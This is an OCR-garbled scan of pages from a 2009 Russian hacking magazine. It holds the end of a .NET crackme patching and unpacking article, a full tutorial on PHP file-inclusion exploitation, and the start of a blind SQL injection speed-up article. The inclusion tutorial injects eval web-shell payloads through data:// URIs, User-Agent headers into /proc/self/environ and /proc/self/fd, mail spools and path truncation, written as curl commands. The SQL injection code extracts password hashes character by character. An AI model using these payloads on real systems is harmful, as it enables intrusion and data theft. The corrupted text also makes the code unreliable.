МісгозоіС .ѴізиаІВазіс . МздВохЗСуіе , 
оЬд есС ) 

Меняем Ьііаізе на Ьгігие, чтобы прыжоксо- 
вершить, ну а чтобы избежать проверки еізе іі, 
меняем адрес П_01 10 на ІІЛЛЗсІ. 

Вывод решения в текстбоксе формы 

ІЬ_013сі: Ісіагд.О 

ІЬ_013е: саІІѵігС іпзСапсе сіазз 

[ЗузСеш.Шіпсіоѵ^з . Рогшз ] ЗузСет. 
Міпсіомз . Рогшз . ТехСВох арр14. 
доез : : деД_ЬхД ( ) 

ІЬ_0143: ІсізСг " іт ' { і } крѵ^гп " 

ІЬ_0148: саіі окдесС арр14.Епсг 

урС : : РагзеапсЮесгурС ( зігіпд) 
ІЬ_014сі: саіі зСгіпд 

[МісгозоіС .ѴізиаІВазіс] МісгозоіС . 



ѴізиаІВазіс . СотріІегЗегѵісез . 
Сопѵегзіопз: : ТоЗВгіпд ( окд еск ) 
ІЬ_0152 : саІІѵігС іпзСапсе ѵоісі 

[Зузкеш.Ѵ/іпскжз . Рогшз] ЗузСеш. 
Міпсіомз . Рогшз . ТехкВох : : зек_ 

Техк ( зкгіпд) 

ІЬ_0157: гек 

Влевой панели кликаем на названиебинарника, 
затем нажимаем кнопку 5аѵе аз и сохраняем его 
под именем аррі 4_раІсНесІ. Запускаем, вводим 
любую фразу и в текстбоксе получаем кодовое 
слово іЬаіеіЬегед ! ! ! 

НАМ НЕ СТРАШЕН 
СЕРЫЙ ВОЛК 

Неужели все действителен о та к просто? На самом 
деле и да, и нет. Если мы (и ещетуевахуча людей] 
знаем о возможности восстановления кода, об 
этом должны были позаботиться в МісгозоН Да и 
другие конторы не прочь предоставить решения 
позащите отанализа и реверса. В целомтаки 
есть, только решения эти далеко не всегда обес- 
печивают реальную защиту. 

Начнем собфускации. В поставку ѴізиаІЗНбіо 
входит^пила под названием Ооііизсаіюг. Ее 
задача — усложнить работу реверсера за счет 
изменения имен классов, методов и переменных, 
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ДАМП ПАМЯТИУЖЕ РАСШИФРОВАННОЙ СБОРКИ 



. ® К 



Г№ 



20;2в 



а также шифрования строк. Она так и делает, но анализ кода 
от этого не усложняется. Нуда, теперь методы называются 
типа а, Ь...Тотже обработчик мы легко идентифицируем по 
определен ию делегата, а шифрованные строки все равно будут 
расшифрованы. Так что, ни хрена это не защита. 

Второй метод связан со статическим шифрованием всей сбор- 
ки. В бинарник вставляется нативный код, который расшиф- 
ровывает сборку при загрузке приложения и защищаетее от 
статического анализа. Решений таких — ну просто очень много. 
Одно из самых известных — СобеѴеіІотХНЕО. Реально крутая 
тулза! Попробуем зашифровать сборку и открыть ее в Рейесіюг. 
Оба-на, ошибка: «Мобиіе ... сіоез пей сопіаіп СІ_І Ьеабег». 
Рейесіюг, ІІІІ0А5М и другиеутилы даже не идентифицируют ее 
как.ІЧЕТ-сборку. Между прочим, в Ргоіюззіопа 1-верси и утила 
стоит 1 200 зеленых рублей, а лозунгее — «Ооп’іцизі: сопіизе 
Ьаскегз. ЗЕор Нет». Впечатляет и вдохновляет! 

Ломается такая защита в два счета. Давай подумаем. Если 
сборка расшифровывается в памяти перед передачей управ- 
ления СйР, значит, нужно просто снять дамп памяти. Загру- 
жаем «защищенную» по самые никуда сборку в память и цеп- 
ляемся кней ѴѴіпНех’ом (Тооіз Ореп Рат; далее выбираем 
процесс и модуль в нем]. Копируем в файл содержимое памяти: 
СТРЕ+А, затем Ебк-> СоруАй-> Іпіо ІЧеѵѵРіІе и сохраняем 
под именем аррі 4_ипѵеіІесІ.ехе. Пытаемся запустить и ловим 
ошибку инициализации. Видимо, где-то поползли секции. 
Открываем в Рейесіюг и, о чудо, код как на ладони; правда, не 
работает Рейехіі, вылетая с исключением. Запускаем ІЮА5М, 



делаем дамп Ій и компилируем... — получаем новую полностью 
работоспособную сборку со снятой защитой. Во как! 
Справедливости ради стоит отметить, что втекущей версии 
СосІеѴеіІ 3.2, позаявлению разработчиков, реализована дина- 
мическая защита во время исполнения, что сильно затрудняет 
задачу. Необходимо детально исследовать нативный код 
шифровщика. Мне кажется, что создание ипраскег’а — лишь 
вопрос времени. Пока ни кто эту зада чу не решил, такчто 
дерзай, возможно, получится у тебя. 

Таким образом, программисту приходится полагаться только 
на самого себя. Можно шифроватьсборки, динамически 
расшифровывать их во время исполнения и подгружатьс 
помощью АррІісайоп.І_оасі. В общем, все как в старом добром 
АззетЫег’е. А можно воспользоваться виртуальными контей- 
нерамитипаТЫпАрр илиХепособе. Нуа лучше всего и вовсе 
реализовывать критические участки с помощью неуправляе- 
мого кода. 

ИЗ РОССИИ С ЛЮБОВЬЮ 

Помни, что только практика способствуеттвоему развитию. Как 
видишь, все нетакуж сложно, но, заходя на сайт глобального 
рейтинга ѵѵѵѵѵѵ.ѵѵесЬай.пеІ: . я с грустью обнаруживаю Россию на 
25-м месте. В рейтинге зарегистрировано всего 5 российских 
хакеров-участников! Давай поддержим нашу страну: регистри- 
руйся на сайтах-челленджах и бросай баллы в копилку Родины. 
Все описанные действия совершены под музыку Джо Кокера. 
Слушай блюз и будь счастлив ! ~ѵг 




> сЫ 

На дискеты найдешь 
все упомянутые в 
статье тулзы, офици- 
альное описание СИ 
от М іеговой, а также 
препарируемый 
СгаскМе и его про- 
патченную версию. 



ХАКЕР 07 /127/ 09 



► 059 




взлом 



» 







X МАГ / ІСО 884888, НТТР://ѴѴАР-СНАТ.ПІІ / 




СПОСОБЫ 



НОВАЯ ВЕХА 

В ТЕОРИИ ИНКЛУДА 



СВЕЖИЕ СПОСОБЫ РАСКРУТКИ ЮСМ И НЕМОТЕ РНЕ ШСІЛЮЕ 



Спроси себя: что ты знаешь об удаленном или локальном инклуде? 
Наверняка, в ответе будут следующие фразы: «обрезание неугодного 
расширения с помощью нулл -байта», «инклуд файлов сессии из Дтр, 
картинок с шеллом, логов апача...». Спешу заверить, что это далеко не 
все способы выжать из инклуда абсолютный максимум! Сейчас 
я в подробностях расскажу о недавно опубликованных интересней- 
ших способах эксплуатации этого распространенного бага. 



» ПРОТОКОЛ «й АТА» 

| Первым делом хочу познакомитьтебя с 
| отличным способом обхода множества хитрых 
фильтраций при удаленном инклуде. Сей спо- 
соб заключается в использовании протокола 
Озіа (для понимания протокола желательно 



изучить НРС 2397, ссылки на который, как 
всегда, ищи в сносках]. 

Итак, представь, что в исследуемом рбр- 
скрипте (рЬр>=5.2.0 — именное этой версии 
включена поддержка баіа и других протоко- 
лов] содержится следующий код: 



<?р]тр 

$с!іг = $_СЕТ[ ' с1іг 1 ] ; 

/ /наш мега-фильтр 

$сііг = зСг_гер1асе (аггау ( ' ЦЦЦр 

' ССр : / / , $с!іг ) ; 



► обо 
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тілычэ-р^тМі: 



РНР ѴвГХІйП 5.2.4 



%)<«■ 


ѴіЛпитп, МТ №0 5.1 7Ш 


ОІНЫ [І-.Ѵ^ 


т ЗП 2007 07:05:4В 


СімЛр» ГошьиЫ 


С*іг1р1 Мвдд ипі^иц Д ■-«шВДцгирИхМнЛЧ - 




Арат» ?йНн>Рім 


ИГСМІПКІ*Ю$І«МТ 


«пйЕИМ 


С«ЛрЦПпі№*4(<Мі 

Р.ЙІІ 




итІиКпЛцііЛІІяііПІ* 




ИР ЛИ 


200Л-ЗК 


РНРРииліиі 


20ИШИЭ 


ГниІ ІМіінІйП 


ШШі 


1№ч»М 


ПО 


Ін*#і«аМѵ 





ЭТО И ЕСТЬ РНРШРОО ЧЕРЕЗ ПРОТОКОЛ РАТА 




1-ИН 1 

ІГ-Х-- 1 

ІГУХ 1 

і 

ІГ14К--”--- І 

Іг-И 1 



ьтщигип иич 
ЬШНГгЗй МТІЫ 

ииагил иии 
аиигип ииѵ 



ВЫВ0Д/РК0С/5ЕІ.Р/Р0 




ОРИГИНАЛЬНОЕ А0ѴІ50РѴ РНР 
РИ-ЕРАТНТКиМСАТІОЫ 



Ггого іпдЬагпЬ870рЬр5-пб8 . ѵсі . сііѵі . зъаЪІесгапзіъ . сого Гп «Іип 12 13:45:33 2009 
Нес иг п- Рас Ь: 

Х-Ог ідіпаІ-То: 1пдЬатЬ870 ІосаІЬозс 
Оеі іѵегесі-То : іпдЬаігіЪ870 ІосаІЬозС 

Ресеіѵесі: Ьу рЬр5-п68 . исі . сііиі . зсаЫесгапзіс . сою (Розсііх, ігогп изепсі 1028) 
ісі А76762 1В8859; Ггі, 12 ,1ип 2009 13:45:33 -0500 (СОТ) 

То: іпд1іагоЬ870 ІосаІЬозс 
ЗиЬ^есс: 111 

Иеззаде-Ій: <20090612 184533 . А76762 1В88590р1ір5-п68 . исі . й*ы1 . зсаЫесгапзіС . сою> 
Оасе: Гп, 12 ,1ип 2009 13:45:33 -0500 (СРТ) 

Ггого: іпдЬаігіЪ870р1ър5-п68 . исі . сііиі . зсаЫесгапзіс . сою (іпдЬаюЬ87) 



МЫЛО, ОТПРАВЛЕННОЕ ТЕКУЩЕМУ ПОЛЬЗОВАТЕЛЮ НТТРй 



//стандартный файл инклуда для любой 
директории 

$<5іг .= ' /радез/беіаиік . рЬр 1 ; 

/ /собственно , инклуд 

іпсіибе ( $біг . ' /радез/беіаиіб . 

рйр ' ) ; 

?> 

Кажется, что в этой ситуации не прокатит ни- 
какой удаленный инклуд. Ведь, крометого, что 
режутся стандартные "ЫТр://", "Йр под нож 
фильтра попадаютеще и точка со слешем! 
Атеперь посмотри внимательно на следующий 
эксплойт для нашей Р РІ и красивого обхода 
фильтра, мешающего добросовестному хакеру 
(как и при любом другом удаленном инклуде, 
директива РНР — а Иоѵѵ_и гІ_і псіисіе, естествен- 
но, должна находиться в положении 0 п] : 

ТШбр: / /Іосаійозб/іпсіех . 
р!ір?біг=баба : ,<?рйр еѵа1($_ 

КЕСШЕЗТ [сшб] ) ; ?>&сшб=р1іріпЕо ( ) ; 

Этот код вполне успешно покажеттебе вывод 
функции рЬріпбоО ! Но что делать, когда 
фильтрация становится еще более жесткой и 
принимает примерно следующий вид? 

<?рйр 

//более навороченный фильтр 
$біг = збг_гер1асе ( аггау ( ' _ ' , ' ] 

' , ‘ Г , ' ) ' , ' , ‘ЬЬСр:// ' , ’бб 

Р ://’ , $йіг) ; 

$біг = йбтізресіаісйагз ($біг) ; 

?> 



Ты снова можешь подумать, что здесь невоз- 
можно выполнить произвольный рбр-код 
(даже по приведенному выше сценарию], так 
как фильтром режутся практически все сим- 
волы, используемые в нашем еѵіі-коде. Но не 
тут-то было. Уже полюбившийся тебе протокол 
«баіа» поддерживает та кую полезную вещь, 
как Ьазе64 (кстати, если фильтруются и симво- 
лы «+», «=», наверняка, ты сможешь подобрать 
Ьазе64-значение своего шелла без них]. 

йРРр : //ІосаІЬозб/іпбех. рйр?біг=баб 
а : ; Ъазе64 , РБ9^аНАд2Х2йЬСдкХІ ЦЕбѴѴЕ 
ІЛР.ѢУ2 1кХ8к7ІБ8+&стс1=рйріп:і:о ( ) ; 

("+" заменить на игі -кодированное 
" %2Ь" ) 

И вновьна экране рЬ рі пбо(] ! 

Но нельзя останавливаться на одном лишь 
РРІ. Приготовься к самому вкусному. 

УСЛУЖЛИВЫЙ 

/РК0С/5ЕІ.Р/ЕМѴІК0М 

Представь, что на определенном сайте ( Ьйр:// 
зііе.сот ] присутствует следующий рбр-код: 

<?рйр 

$раде = $_СЕТ [ 1 раде ’ ] ; 
іпсіибе ( 1 . /радез/ ’ . $раде) ; 

?> 

Затем вообрази, что возможности залить 
файл/картинку с шеллом у нас нет, пути к логам 
апача мы не нашли, а в Дтр не сохраняются 
данные сессий. Соседних сайтов также нет. 

Что делать? 

Неискушенный в І_РІ хакер опустил бы руки. 

Мы не из таких, ибо на помощь спеш ит хра- 
нилище переменных окружения /ргос/зей/ 



епѵігоп! Итак, когда мы запрашиваем любую 
рбр-страничку на сервере, создается новый 
процесс. В *піх-системах каждый процесс 
имеет свою собственную запись в/ргос, а / 
ргос/зей, в свою очередь, — это статический 
путь и символическая ссылка, содержащая 
полезную информацию для последних про- 
цессов. 

Если мы инжектнем наш еѵіі-код в /ргос/зей/ 
епѵігоп, то сможем запускать произвольные 
команды с помощью ЕРІ :]. Заманчиво? А 
теперь, собственно, вопрос: каким образом 
можно вставить свое значение с еѵіі-кодом в/ 
ргос/зей/епѵігоп? 

Очень просто! Тем же способом, каким ты 
инжектишь свой код в логи апача, можно про- 
инжектить код и в /ргос/зей/епѵігоп. 

Для примера возьмем наш любимый и легко 
подменяемый юзерагент. По дефолту часть/ 
ргос/зей/епѵігоп, показывающая изегадепр 
выглядит примерно так: 

РАТН=/зЬіп: /изг/зЬіп: /Ьіп: /изг/ 
Ьіп: /изг/ХІІКб/Ьіп: /изг/Ьіп: /Ьіп 
8ЕКѴЕК_АБМШ=ас1тіп@зіке . сот 

МогіІІа/5.0 (Міпсіомз ; II; ѴІіпбомз Ж 1 
5.1; еп-ІІЗ; гѵ: 1.9. 0.4) 

Сеско/2 00810292 0 Еігеіох/3 . О . 4 
НТТ Р_КЕ Е Р_АЬ I ѴЕ = 1 5 О 

Атеперь меняем юзерагент на <?рбр еѵаІ($_ 
0ЕТ[стб]]; ?> и обращаемся к нашему уязви- 
момускрипту следующим образом: 

сигі "йРРр : //зібе . сош/іпбех . рЬр?р 
аде= /ргос/ 
зеІі/епѵігоп&стсЩрйріпіо ( ) ; " -Н 
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Нагое : саЪ 

ЗЪаЪе: К (гиппіпд) 

ЗІеерАѴО: 78% 

Тдій: 1228 

Рій: 1228 

РРій: 1164 

ТгасегРій: О 

1Ий: 30 30 

Сісі: 8 8 

ГРЗіге: 64 

Сгоирз: 8 

ѴгоРеак: 2 616 кВ 

ѴтЗіге: 2608 кВ 

ѴтЬск: 0 кВ 



ііггѵег АрасЬ* 2 0 Напсйет [АрасЬе/2.2 0 {І 4 пшь?ЗТТІЩі] 


РЬр суаі 


ЗухСет Інзідх ЕагчѵеЪ 2 & 16 ,21-0 8 -хтр #1 2МР М™ ІиІ 3 1825 39 ЦТС 2006 


рпп! '<рлв>'.' саГ; /ртос^еМР/егтгоп ' .'</ргв>'; 




РЪр ѵеггіоп 5.1.2 1 Зай- ОЙГ| Цгег ГахіѵеЪ (1004 1000) 


Нозйаате Роіі 


/Ьокіс/ /Ы&са/ 







ѴтНШМ: 424 кВ 

ѴюКЗЗ: 424 кВ 

ѴтРаСа: 164 кВ 

ѴтЗск: 84 кВ 

ѴшЕхе: 20 кВ 

ѴтЫЪ: 1284 кВ 

ѴшРТЕ : 20 кВ 

Ткгеасіз : 1 

ЗідО: 0/71680 

ЗідРпсі: 0000000000000000 



сигі "Ы;1ср : //зііе . сот/іпсіех . рЪр?раде 
. /ргос/1228/ 

1с1/2&стс1=р]іріп:Ё:о ( ) ; " -Н "ІІзег-АдепЦ : <?р!ір 
еѵаі ( \$_СЕТ [стсі] ) ; ?>" 



* 1-Ё53КЁѴ*/ ССс/ ІеэлкеУ’&тНАИРАТН'/и-эг/ 1осаі/піасѵ;/чэг/ іосйі/ііисі/імп : / иіг/ іЬан/пп ; / «эг/ ХііРІ/інаси/ортѴдпоіііе/зЬлге/лчтШРОФІЕ"/ иэг/ Іос* 



Нате | 1 Тепл* 


Омтісг;Сгоіір 1 1. аяі 


Ші 


і)і оч а 


□ Г” 


























1 


Ьл :]і_Ьі^огу (0 ЗкЬ) .гиг-і?™ 


' г 0«Ѳ4 2007 13 51:16 











ВЫВ0Д/РР0С/5ЕІ.Р/ ВЫВ0Д/РВ0С/5ЕІ_Р/ЕМѴІВ0Ы 
5ТАТІІ5 



"ІІзег-АдепР : <?р1ір еѵаі ( \ $_СЕТ [стсі] ) ; ?>" 

Как и следовало ожидать, функция рЬріпЫ) успешно вы- 
полнится. При этом часть/ргос/зеіі/епѵігоп с юзерагентом 
будет вы глядеть та к: 



^1»Ті 

НТТР://ѴѴѴѴѴѴ 



> Ііпкз 



2. Напрямую, без узнавания іб процесса 



• ги.рЬр.пеі/тапиаІ/ 
ги/ѵѵгаррегз.сІаіа.рЬр 

— протокол Оаіа (РРС 
2397) и описание его 
использования в рбр. 
еп.ѵѵікіребіа.огд/ѵѵікі/ 
Раіа ЦРІ зсЬеппе 

— описание самого 
протокола. 

• изб. Д/2008/08/1 8/ 
Ш2гсе-1оса1- 
біе-тсіизіоп- 
Іо-гетоіе-собе- 
ехесиііоп-абѵапсеб- 
ехріоііабоп-ргос- 
збогісиіз — ргос 
збогіюіЛз. 
тіІѵуОгт.сот/ 
рарегз/260 — все о 
6РІ/РРІ. 

• ібіоддеп.зе/сз/ 
Ыодз/зесіеат/ 

а гсЫѵе/2009/0 1 /26/ 

аЦегпаІіѵе-ѵѵауз- 

іо-ехр[оіі-РНР- 

гетоіе-біе-іпсіибе- 

ѵиІпегаЬіІбіез.азрх 

— инклуд через таіі. 

• изб.іі/2009/02/08/ 
рбр-іііезѵзіет- 
аііаск-ѵесіогз — ата- 
ка на рбр-біезузіет. 

• гагОг.пате/агбсІез/ 
пиЦ-бѵіе-аиегпаііѵе 

— подробно об 
альтернативе нулл- 
байту. 



РАТН=/ зЬіп : /изг/зЬіп: /Ьіп: /изг/Ьіп: /изг/ 
ХІІЕб/Ьіп: /изг/Ьіп: /Ьіп 
ЗЕКѴЕК_АБМШ=асітіп@зіЦе . сот 

<?рЬр еѵаі ($_СЕТ [стЬ] ) ; ?> НТТР_КЕЕР_ 
АЬІѴЕ=150 



Метод всем хорош, кроме того, что строка юзерагента и 
еѵі 1-код должны быть внедрены быстро и одновременно 
(так кактвой код в/ргос/зеіі/епѵігоп легко сможет изме- 
нить любой другой только что запущенный процесс). Поэ- 
тому, намотав вновь полученные знаниянаус, переходим к 
следующему способу. 

ЛОГИ, МЫ ВАС НАЙДЕМ! 

Снова представь, что у нас есть сайтслокальным 
инклудом, но проинклудить ничего не получается. 
Какузнать местонахождение апачевских ассезз_1од 
и еггог_1од? По секрету скажу, что знать, где они 
лежат, вовсе не обязательно! Для нас постарался 
все тот же /ргос, ведь здесь расположена удобная 
символическая ссылка на реальную локацию логов 
арасбе. 

Использовать ее для инклуда можно несколькими спосо- 
бами: 

1. Через іб процесса и ярлыки 

/ргос/% { РІБ} / ІЬ/ % {ЕВ_ІБ} 

Здесь: %{РЮ} — ид процесса (узнать можно, прочитав/ 
ргос/зеіі/зіаіиз), %{РО_Ю} — ярлыки на соответствующие 
файлы (обычно 2 и 7 — логи апача). 

Пример: 

бШДр: //зііе . сот/іпЬех.рЬр?раде= 
/ргос/зеІі/зДаСиз 

Допустим, %{РЮ} равен 1 228, тогда конечный эксплойт 
будет выглядеть следующим образом: 



сигі "ІЩЦр : //зіДе . сош/іпЬех . рЬр?раде 
/ргос/зеіі/ 

іЬ/2&стсі=рЬріпіо ( ) ; " -Н "Ьзег-АдепД : <?рЬр 
еѵаі ( \$_СЕТ [стсЦ ) ; ?>" 

Этот способ более приемлем для тебя, так как «зеіі» — это 
всегда текущий процесс, а в первом случае %{РЮ} имеет 
дурное свойство очень часто меняться. В обоих перечис- 
ленных способах, каки влюбом другом бН логов апача, 
эти самые логи, естественно, должны быть доступны для 
чтения. 

ПОЛЕЗНОЕ МЫЛО 

На этот раз тебе необходимо представить, что на сайте 
жертвы не работают все предыдущие способы 1_РІ. 
Невероятно и страшно! Но такие случаи действительно 
бывают, и итальянские хакеры зесіеат смогли при- 
думать удивительный способ инклуда через обычный 
е-таіі! 

Итак, большинство типичных веб-приложений содержат 
в себе функцию отправки мыла в качестве части регист- 
рационной системы, каких-либо подписок и т.д. Зачастую 
юзер может изменять содержимое такого письма. В то же 
время никсы могут сохранять такое мыло локально. 
Саматехника І_РІ через таіі выглядит следующим обра- 
зом: 

1. У атакующего есть профайл в веб-приложении на уязви- 
мом сервере. 

2. Атакующий изменяет какую-либо часть профайла (на- 
пример, а бои!), которая должна прийти в письме в качес- 
тве подтверждения смены информации, на свой еѵіі-рбр 
код, подготовленный для локального инклуда. 

3. Атакующий изменяетсвой е-таіі на ѵѵѵѵѵѵ-баіай 
Іосаібозі: (ѵѵѵѵѵѵ-баіа — юзер, под которым запущен Ыірб; 
им могут быть такие значения, как«арасбе», «ѵѵѵѵѵѵгип», 
«побобу», «ѵѵѵѵѵѵбаіа» и т.д.). 

В итоге, отправленное мыло будет лежать в /ѵаг/таіі (либо 
в/ѵаг/зрооі/таіі) и иметь название юзера ЫірсІ. 
Вотэксплойтдля этого способа: 



► 062 
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взлом 



сигі "ЪДкр : / /зіке . сот/іпсіех .р1тр?раде= 
/ѵаг/таі1/ѵ\плплг- 

<іаРа&стсі=рЬріпЕо { ) ? " 

Также, стоит отметить, что таіі-файл будет доступен только 
тому юзеру, кому и предназначено письмо (то есть, апач 
должен быть обязательно запущен подтем же пользова- 
телем). 

ІЧШ-І--БАЙТ ОТДЫХАЕТ 

Снова включи воображение и представь, что все 
вышеописанные способы отлично работают, но 
уязвимое приложение содержит на этот раз следу- 
ющий КОД: 

<?рЬр 

$раде = $_СЕТ [ ' раде 1 ] ; 

//защита от "ядовитого нуля" 

І:І ( ! деЦ_тадіс_диоСез_дрс ( ) ) 

$раде = асМзІазІіез ($раде) ; 

іпсіисіе ( ' . /радез/ ' . $раде . ' . рЬр ' ) ; 

?> 

Как быть? Можно п рои нклудить логи, но в конце дописыва- 
ется не обрезаемое обычным %00 расширение « . р Ь р » . 

На этот раз тебе поможет фича (или все-таки уязвимость?) 
самого рбр, обнаруженная юзером популярного забугор- 
ного хакерского форума зіа.скегз.огд со странным ником 
ЬагЬагіапЬоЬ. 

Фича заключается втом, что интерпретатор рбр во 
время обработки пути до какого-либо файла или 
папки обрезает лишние символы «/» и «/.», а также, в 
зависимости от платформы, использует определенное 
ограничение на длину этого самого пути (ограничение 
хранится в константе МАХРАТНІ_ЕІ\І). В результате, все 
символы, находящиеся за пределами этого значения, 
отбрасываются. 

Теперь давай подробней рассмотрим этот вектор І_РІ, обра- 
тившись к уязвимому скрипту следующим образом: 

сигі "Ъ±Щр: //зіСе. сот/іпсіех. ркр?раде= 

/ргос/зеіі/епѵігоп/ ////////// 
[4096 слешей] / ////// /&стсі=р]тріп^о (); " -Н 
"ІІзег-АдепС : <?рЬр еѵаі ( \$_СЕТ [стсі] ) ; ?>" 

Наш любимый рЬріпбоО ; выполнится успешно из-за не- 
скольких причин. 

1. Инклуд в самом скрипте примет следующий вид- 

<?рЪ.р 

іпсіисіе ( ' . /радез/ 

ргос/зеіі/епѵігоп////////// [4096 сле- 
шей] //// . ркр ' ) ; 

?> 

2. Так как наш путь получится гораздо длиннее, чем 
МАХРАТНІ_ЕІ\І (кстати, необязательно он будет равен 
именно 4096; в винде, например, он может быть равен 
всего лишь 200 символам с хвостиком, — советую на каж- 
дой системе тестить это значение отдельно), то символы, 
находящиеся в конце пути (в данном случае — некоторое 
количество слешей и «.рЬр»), интерпретатор рбр, не спра- 



шивая ни у кого разрешения, успешно отсечет. 

3. После пункта «2» наш код примет примернотакой вид: 

<?рйр 

іпсіисіе ( ' . /радез 

ргос/зеіі/епѵігоп///////////// [куча сле- 
шей] ' ) і 

?> 

Как тебе уже известно, лишние слеши в конце пути 
услужливый рбр также обрежет, и наш злонамерен- 
ный код, в конце концов, превратится во вполне 
рабочий ЕРИ 

<?рйр 

іпсіисіе ( ' . /радез 
ргос/зеіі/епѵігоп ' ) ; 

?> 

Для теста количества слешей для использования в данной 
уязвимости на своем сервере советую попробовать следу- 
ющий рбр-скрипт. 

<?р!ір 

/ /какой файл нужно проинклудить 
$іі1е_іог_іпс1исіе = ' ѵтогк . РхР ' ; 

іог ($і=1;$і<=4096;$і++) 

{ 

$іСз_ѵ\гагк = іі1е_деС_сопЦепСз ( 'іШСр:// 
ІосаІйозС/ЦезС/ ' . $іі1е_іог_іпс1исіе . зСг_ 
гереаС ('/',$ і ) . ' . ркр ' ) ; 

іі ( $іСз_ѵтогк== ' 1 ' ) 

{ 

ргіпС 'Использовано слешей: ' . $і ; 

Ьгеак; 

} 

} 

?> 

Рядом со скриптом просто положи файл ѵѵогк.М с записан- 
ной в нем единичкой. 

Если инклуд произошел успешно, скрипт выведеттебе 
количество слешей, использованных для этого самого 
инклуда. 

Для полноты понимания технических сторон данного бага 
советую очень внимательно изучить соответствующие 
ссылки в сносках. 

И НАПОСЛЕДОК... 

Как видишь, прогресс в ресерчинге уязвимостей не 
стоит на месте. Новые баги находятся уже не в р Ь р - 
скриптах, а в самом интерпретаторе рбр! То, что раньше, 
казалось, взломать невозможно, сейчас представля- 
ется не более чем детской шалостью и развлечением 
для матерого хакера. ІЧиІІ-байтуже практически канул в 
лету, инклуд логов апача обрастает новыми изощренными 
методами, РЕІ становится доступным через протоколы, 
отличные отйр и Ыір... Что дальше? Поживем — увидим. 
Естественно, в наших рубриках :). ~г 



» 




> іпіо 

• Спасибо Античату за 
раскопки описанных 
уязвимостей. 

• І_РІ/РРІ или просто 
«Еосаі/Репгюіе Рііе 
Іпсіисіе» — наиболее 
часто встречающаяся 
уязвимость в рбр- 
скриптах. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 
с целью ознаком- 
ления! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 




> СІѴСІ 

• Все скрипты 

и примеры инклудов, 
упоминающихся 
в статье, ищи на 
диске. 

• На дискеты найдешь 
увлекательный видео- 
урок, позволяющий на 
практике увидеть пе- 
речисленные в статье 
способы инклуда. 
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БЫСТРОТА 



НОВЕЙШИЕ МЕТОДЫ ВЫЫО 501. І^ЕСТІОЫ 



Каждый раз, натыкаясь на слепую 50Ь инъекцию, ты представляешь 
себе долгие минуты ожидания получения результатов из базы. 

Все знают, что процесс работы ускорить невозможно. Да неужели? 
Прочитав эту статью, ты заставишь свои инъекции отрабатывать по 
максимуму и станешь реальным 5СП_-гуру. 



Основной проблемой при работе с ВІіпсІ 501- 
2 Іпіесііоп является огромное количество запро- 
т сов, которое необходимо послать на сервер для 
й получения символов из БД. 

А соответствен но — долгое время работы скрипта 
и большое количество записей в логах. Вручную 
получать данные из БД праетически нереально, 
поэтому процесс работы стакими инъекциями 
нужно автоматизировать. Сейчас мы рассмотрим 
некоторые варианты подобной автоматизации. 



ПОЛНЫЙ ПЕРЕБОР 

Это самый простой, самый тупой и самый 
медленный способ получения символов из 
базы данных. Для получения обычного МБ5- 
хеша может потребоваться отправить до 512 
запросов на сервер, а для получения логина 
— еще больше. Именно этот метод нович- 
ки применяют в своих первых эксплойтах. 
Реализация указанного способа выглядит 
приблизительнотак: 



Іог ( $і=1 ; $і<=32 ; $і++ ) 

Іог ($3=1; $з<=255; $3++) { 

$гез = зет} ( 

$иг1 , 

"зді .рЬр?іс1=і^ (азсіі (зиЪзЪгіпд ( (зе 
1есЪ+раззЬазЬ+1:гот+изегз+ѵ\гЬеге+іс1= 
0} , $і , 1 ) ) =$з , ( зе1есЪ+1+ипіоп+зе1ес 
Ъ+2 ) , ' 1 ' ) " 

) ; 

іі ( !ргед_таЪс]г ( 1 /ЗиЪдиегу 
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ТоЬаІ: 48 циегіе: 
С:\рЬр-5.2.6-Иіп32> 



МЕТОД СРАБОТАЛ ЗА48 ЗАПРОСОВ, ОЧЕНЬ НЕПЛОХО! 



С : \\Ѵ ШОІѴБѴэухІет 3 2\ст Л . ЕХ Е 




Щ7В 


И 


С : ЧрЬр-5 .2 . 6-Міп32 >рЬр чегуРазЪ -рЬр .хч»:8012/з<і1.рЬр?іа=1 раззый из« 

КезиІЬ : 63а9Р0еа7ЪЪ98050796Ь649е85481845 
ТоСаІ: 38 циегіез 

С : ЧрЬр-5 . 2 . 6-Міп32 > 


;гз 5 
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СКОРОСТЬ РАБОТЫ БЬЕТ ВСЕ РЕКОРДЫ 




й поиск - Онкнпгцчн - МыШа Г ігиТо; 



?СЛ«ал ДкЛідаи ШМЯ** 

С X Ф І ЛѴ (-ЙО : і!т . 

I ЕочДГьнЬя сгранниь РЮитл твОсГні 0 гг-іруи ДІИИЧАГ -I 



■ ИЛр4н№й статьи 

■ ГЕчувиг Ія 



| ПкркОти | I НлГяи | 
‘(НШНв 



1 Описании метола 

2 Поиск Флеминга спсортаррианного мае [«из 
Я Прлыіпіі'ліли 

4 Птн:і іімччмміііі иммігммнмгіП і|Пі>іі 11^11' 

5СМ.1І 
Б Ссыпки 
7 Литература 



. Р р1нц.ос.(іо СНвЫО 



Описание метода 

Сформулируем основные теоремы 




тгп. функция /(х) е С([о т &]) : /(а) = А> /(Ь) = и. тогда УС е [Д В] Зс ^ [п, і| : /(с) ? 

Сладеіик. 

пуйьфріпріи/(:г) <= С( [а т &]). іагдщісгші > (], /(&)< ЩірЗс ? [а, Ь\ : /(с) 

и Образам, если мы ищем ноль, тй на концах «Тройка функция должна быть разных знаков Разделим отрезок пОпОЛзм и возьыОм Т; 
половинок, для которое на концах функции по-прежнему принимает енвченин разных эннгов. Если середнчиея течса вкаа алое ь искомым 
ісуміи. то «іррцьсс оадоршашп 

Еслшвд*» 1«МООЧ* 9МЧИСЛ0МНЙ Тр ЦизцлДуру сп^урі (Тро^члЖнц, ДО ІПІ гшр, Ярка ДЯшн;і ЛТуКШз ІМЗ сіпшЦ іими.ііш ^ 

Для пйисаса лрйиіиопкнОт эначАыил ДПС.таТЛчий йычнг.ть. иЪ .эиачямня фушрш иСкОыіМ лнячннип и нСКдт> мпль пАвучмкіирйг.я фуилрйн 

Поиск элемента отсоршров энного массива 

Для поипя элемента массива А, етсорпздоеанногс в воэрастнвщем порядке, применяется следующий алгоритм |! 



і ;* и 

з ;* и.- {ѵхсла з,техе.чт:в кяг г ст&> 

ггрглГ. 



НАВИКИПЕДИИ МОЖНО НАЙТИ ПРОСТОЕМ ПОНЯТНОЕ ОПИСАНИЕ 
МЕТОДА БИНАРНОГО ПОИСКА:) 



гебигпз/ ' , $гез) { 
еейо $з ; 
сопбіпие; 

} 

} 



